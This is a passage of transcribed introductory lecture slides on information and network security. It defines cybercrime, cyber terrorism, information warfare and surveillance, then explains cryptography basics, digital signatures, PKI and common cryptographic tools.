• Various techniques are employed to immediately halt a program when inconsistencies are encountered. This is a quick procedure that enables the bug to be identified and fixed. Other methods involve attempting to correct the bug while allowing the program to continuously run.

• Language Support

• The new programing languages and frameworks are equipped with inbuilt error handing and bug tracking capacities. Use of these languages is highly recommended.


Cyber crime

• There is no universally accepted definition of cybercrime.

However, the following definition includes elements

common to existing cybercrime definitions.

“Cybercrime is an act that violates the law, which is

perpetrated using information and communication

technology (ICT) to either target networks, systems, data,

websites and/or technology or facilitate a crime”

• Cybercrime differs from traditional crime in that it "knows

no physical or geographic boundaries" and can be

conducted with less effort, greater ease, and at greater

speed than traditional crime


Types of Cyber crime

• There are no universally defined crime types but here is an attempt to identify some commonly occurring themes and characteristics

• science community view cybercrime primarily in terms of the level of transformation Internet technologies where the crime is either • assisted ( cyber-assisted crime)

• enabled ( cyber-enabled crime)

• dependent ( cyber-dependent crime)

• The legal and criminological communities, tend to see it more in terms of the different criminal actions or modus operandi (i.e., method of operation) involved. • crime against the computer (hacking)

• crime using the computer (e.g. fraud, bullying)

• crime in the computer (extreme sexual, hate or terrorism materials)

• The political scientists, on the other hand, view cybercrime in terms of the impacts of cybercrime on, • Politics or the political system

• Governments or government agencies

• Private Organizations

• Common citizens or individuals.


Cyber terrorism

• Cyber terrorism is the use of the Internet to conduct violent acts that result in, or threaten, loss of life or significant bodily harm, in order to achieve political or ideological gains through threat or intimidation.

• The aim of cyber terrorism can be ; “The use of computer network tools to shut down critical national infrastructures (such as energy, transportation, government operations) or to coerce or intimidate a government or civilian population.”

• The premise of cyber terrorism is that as nations and critical infrastructure became more dependent on computer networks for their operation, new vulnerabilities are created

• A hostile nation or group could exploit these vulnerabilities to penetrate a poorly secured computer network and disrupt or even shut down critical functions.


Cyber terrorism

What types of information are at risk?

1. Power delivery

2. Communications

3. Aviation

4. Financial services

5. Medical records

6. Criminal records

7. Business plans


Information warfare

• Information Warfare: Any action to deny, exploit, corrupt, or

destroy the enemy’s information and its functions; protecting

ourselves against those actions; and exploiting our own

military information functions.

• Direct Information Warfare changes the adversary’s information without involving the intervening perceptive and analytical functions.

• Indirect Information Warfare changes the adversary’s information by creating phenomena that the adversary must then observe and analyze.


Computer network Surveillance

• Computer and network surveillance is the monitoring of

computer activity and data stored on a hard drive, or data being

transferred over computer networks such as the Internet.

• This monitoring is often carried out covertly and may be

completed by governments, corporations, criminal organizations,

or individuals.

• It may or may not be legal and may or may not require

authorization from a court or other independent government

agencies.

• Computer and network surveillance programs are widespread

today and almost all Internet traffic can be monitored.

• Surveillance allows governments and other agencies to

maintain social control, recognize and monitor threats or any

suspicious activity, and prevent and investigate criminal activities.



Questions??????


MODULE 1:


NETWORK SECURITY

#SaeeJoshi


CRYPTOGRAPHY /

ENCRYPTION #CyberSecurity


Agenda

Introduction to Cryptography / Encryption

Digital Signatures

Public Key infrastructure

Applications of Cryptography

Tools and techniques of Cryptography



• Definition Cryptography is the science of using mathematics

to encrypt and decrypt data.

Phil Zimmermann

• Cryptography is the art and science of keeping messages

secure.

Bruce Schneier

“The art and science of concealing the messages to introduce

secrecy in information security is recognized as cryptography.”

• A message is plaintext (sometimes called cleartext). The

process of disguising a message in such a way as to hide its

substance is encryption. An encrypted message is

ciphertext. The process of turning ciphertext back into

plaintext is decryption.



• A cipher (or cypher) is an algorithm for performing encryption or decryption—a series of well-defined steps that can be followed as a procedure

• A cryptosystem is an implementation of cryptographic techniques and their accompanying infrastructure to provide information security services.

• A cryptosystem is also referred to as a cipher system.



• The set of rules used for encrypting any message is called

as “”key”. We also need a key to decrypt the message.

• There are three types of cryptography:

• Symmetric Key Cryptography

• Also known as Secret Key Cryptography or Conventional

Cryptography, Symmetric Key Cryptography is an encryption system in

which the sender and receiver of a message share a single, common

key that is used to encrypt and decrypt the message.

• The Algorithm use is also known as a secret key algorithm or

sometimes called a symmetric algorithm.

• A key is a piece of information (a parameter) that determines the

functional output of a cryptographic algorithm or cipher.



• Asymmetric Key Cryptography

• Asymmetric Key Cryptography Asymmetric cryptography , also known

as Public-key cryptography, refers to a cryptographic algorithm which

requires two separate keys, one of which is private and one of which is

public.

• The public key is used to encrypt the message and the private one is

used to decrypt the message.

• Hash Functions

• A cryptographic hash function is a hash function that takes an arbitrary

block of data and returns a fixed-size bit string, the cryptographic hash

value, such that any (accidental or intentional) change to the data will

(with very high probability) change the hash value.

• The data to be encoded are often called the message, and the hash

value is sometimes called the message digest or simply digest.


Digital Signatures

• Example of Asymmetric Key Cryptography: DSS

• Digital Signature Standard (DSS) is the digital signature

algorithm (DSA) developed by the U.S. National Security

Agency (NSA) to generate a digital signature for the

authentication of electronic documents.

• DSS was put forth by the National Institute of Standards and

Technology (NIST) in 1994, and has become the United

States government standard for authentication of electronic

documents.

• DSS is specified in Federal Information Processing Standard

(FIPS) 186.


Public Key infrastructure • A public key infrastructure (PKI) is a set of roles, policies,

hardware, software and procedures needed to create, manage, distribute, use, store and revoke digital certificates and manage public-key encryption.

• A public key infrastructure relies on digital signature technology, which uses public key cryptography.

• The basic idea is that the secret key of each entity is only known by that entity and is used for signing. This key is called the private key.

• There is another key derived from it, called the public key, which is used for verifying signatures but cannot be used to sign. This public key is made available to anyone, and is typically included in the certificate document.

• The trusted party signing the document associating the key with the device is called a certificate authority (CA).

• The certificate authority also has a cryptographic key that it uses for signing these documents. These documents are called Digital certificates.


Applications of Cryptography • Authentication/Digital Signatures :

• Before decrypting message using public key one should need authentication that the message is coming from trusted resource.

• To address this weakness, the standards community has invented an objects like certificate and Digital signature.

• Time Stamping • Time stamping is a technique that can certify that a certain electronic

document or communication existed or was delivered at a certain time.

• Electronic Money • Encryption is used in electronic money schemes to protect

conventional transaction data like account numbers and transaction amounts, digital signatures can replace handwritten signatures or a credit-card authorizations, and public-key encryption can provide confidentiality.

• Secure Network Communications. • A public-key protocol called Secure Socket Layer (SSL) for providing

data security layered between TCP/IP and application protocols (such as HTTP, Telnet, NNTP, or FTP).


Applications of Cryptography • Kerberos is an authentication service developed by MIT which uses

secret-key ciphers for encryption and authentication. Kerberos was designed to authenticate requests for network resources and does not authenticate authorship of documents.

• Anonymous Remailers • A remailer is a free service that strips off the header information from

an electronic message and passes along only the content.

• Thus only the person to whom you have sent mail knows your identity not entire chain.

• Disk Encryption. • Disk encryption programs encrypt your entire hard disk so that you

don't have to worry about leaving any traces of the unencrypted data on your disk.

• Cryptography can also be used to encrypt files. In this case, Pretty Good Privacy (PGP) uses the user's private key along with a user-supplied password to encrypt the file. The same password and key are used to unlock the file.


Tools and Techniques of Cryptography • Cyber security professionals can use multiple cryptography tools to build

and fortify their computer system defenses. Here’s a look at five key tools that cyber security specialists can integrate into their strategies.

• Security Tokens

• A security token is a physical device that holds information that authenticates a person’s identity. The owner plugs the security token into a system — via a computer’s USB port, for example — to gain access to a network service. It’s like swiping a security card to get into an office. A bank might issue security tokens to customers to use as an extra layer of security when they log in to their accounts.

• Key-Based Authentication

• Key-based authentication is a method that employs asymmetric algorithms to confirm a client’s identity and can be an effective substitute for using passwords to verify a client. The key factors at play in key-based authentication are public and private keys that confirm identity.

• In public key authentication, each user is given a pair of asymmetric keys. Users store their public keys in each system they want access to, while the private keys are safely maintained on the device with which the user connects to the secured systems.

• When connecting, the server authenticates the user with the public key and asks the user to decrypt it using the corresponding private key.


Tools and Techniques of Cryptography • Docker

• The Docker software platform builds applications based on containers: small self-contained environments that share an operating system kernel but otherwise run in isolation from one another. By their nature, Docker containers are secure. More security can be added by enabling one of several applications that fortify the system.

• Java Cryptography Architecture

• The popular Java programming language has built-in cryptographic functions. The Java Cryptography Architecture (JCA) is integrated with the core Java application programming interface (API). The JCA contains APIs that handle security functions that include encryption, managing keys, generating random numbers securely and validating certificates. These APIs provide a way for developers to build security into application code.

• SignTool

• Another security tool embedded in an operating system is Microsoft SignTool (SignTool.exe). A command-line tool, SignTool can digitally sign and time-stamp files and verify signatures in files. It’s automatically installed with Microsoft Visual Studio, a software development environment. SignTool allows software developers to certify that the code they developed is theirs and that it hasn’t been tampered with since it was published.



Questions??????


MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY

Documents

Transcript of MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY